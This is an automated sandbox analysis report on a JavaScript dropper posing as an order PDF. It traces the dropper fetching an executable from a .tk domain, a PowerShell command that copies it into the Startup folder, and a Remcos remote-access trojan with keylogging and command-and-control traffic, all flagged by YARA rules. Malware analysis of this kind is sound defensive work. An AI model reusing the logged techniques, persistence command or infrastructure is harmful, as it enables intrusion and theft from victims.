            Source: Order Specifications PDF.jsArgument value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsArgument value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: Order Specifications PDF.jsReturn value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', '428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvB', 'ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1W', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,AJ3cTmowW6WowIz1WO5WW4O,W4yuy1BdPSoFWOOIgCo6qge,SaveToFile,WQ3cNSkvBW,W4BcISoRW5q', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Shell.Application,463900CaNtRp,W4BcLCo0oJRcS8kdW4SaWO1/WQaN,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,W5xdQmkr', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']Go to definition
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 17_2_00EE2304
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 17_2_00EE27F7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 17_2_00EE2BC4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 17_2_00EE0CF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 17_2_00EE0CCC
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 17_2_00EE0D08

            Networking

            Source: C:\Windows\System32\wscript.exe, Network Connect: 50.115.174.192 443
            Source: C:\Windows\System32\wscript.exe, Domain query: tgc8x.tk
            Source: Traffic, Snort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.6:58595 -> 8.8.8.8:53
            Source: Order Specifications PDF.js, Return value: ['"MSXML2.XMLHTTP"', '"Send"']
            Source: Malware configuration extractor, URLs: 51.75.209.245
            Source: Joe Sandbox View, ASN Name: VIRPUS VIRPUS
            Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox View, IP Address: 50.115.174.192 50.115.174.192
            Source: Joe Sandbox View, IP Address: 51.75.209.245 51.75.209.245
            Source: global traffic, HTTP traffic detected: GET /tt/VNZVNCXKKJSF.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tgc8x.tkConnection: Keep-Alive
            Source: global traffic, TCP traffic: 192.168.2.6:49711 -> 51.75.209.245:2404
            Source: unknown, Network traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknown, TCP traffic detected without corresponding DNS query: 51.75.209.245
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://ocsp.digicert.com0
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://ocsp.sectigo.com0
            Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000B.00000002.631988238.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.787409928.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000B.00000003.544975348.0000000007A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.422336370.0000000007A26000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micros
            Source: powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
            Source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr, String found in binary or memory: https://sectigo.com/CPS0
            Source: wscript.exe, String found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe
            Source: wscript.exe, String found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g
            Source: wscript.exe, 00000000.00000003.250114367.0000018AB4B65000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo
            Source: unknown, DNS traffic detected: queries for: tgc8x.tk
            Source: unknown, HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49710 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: Systedbddfm.exe, 00000011.00000002.702879498.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud

            Source: Yara match, File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

            System Summary

            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Author: ditekSHen
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE, Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Author: ditekSHen
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants, Author: unknown
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE, Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Author: ditekSHen
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process Stats: CPU usage > 98%
            Source: Order Specifications PDF.js, Initial sample: Strings found which are bigger than 50
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Section loaded: mscorjit.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe, Section loaded: mscorjit.dll
            Source: VNZVNCXKKJSF[1].exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: VNZVNCXKKJSF.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Systedbddfm.exe.11.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Order Specifications PDF.js, ReversingLabs: Detection: 26%
            Source: Order Specifications PDF.js, Virustotal: Detection: 25%
            Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js"
            Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: unknown, Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe"
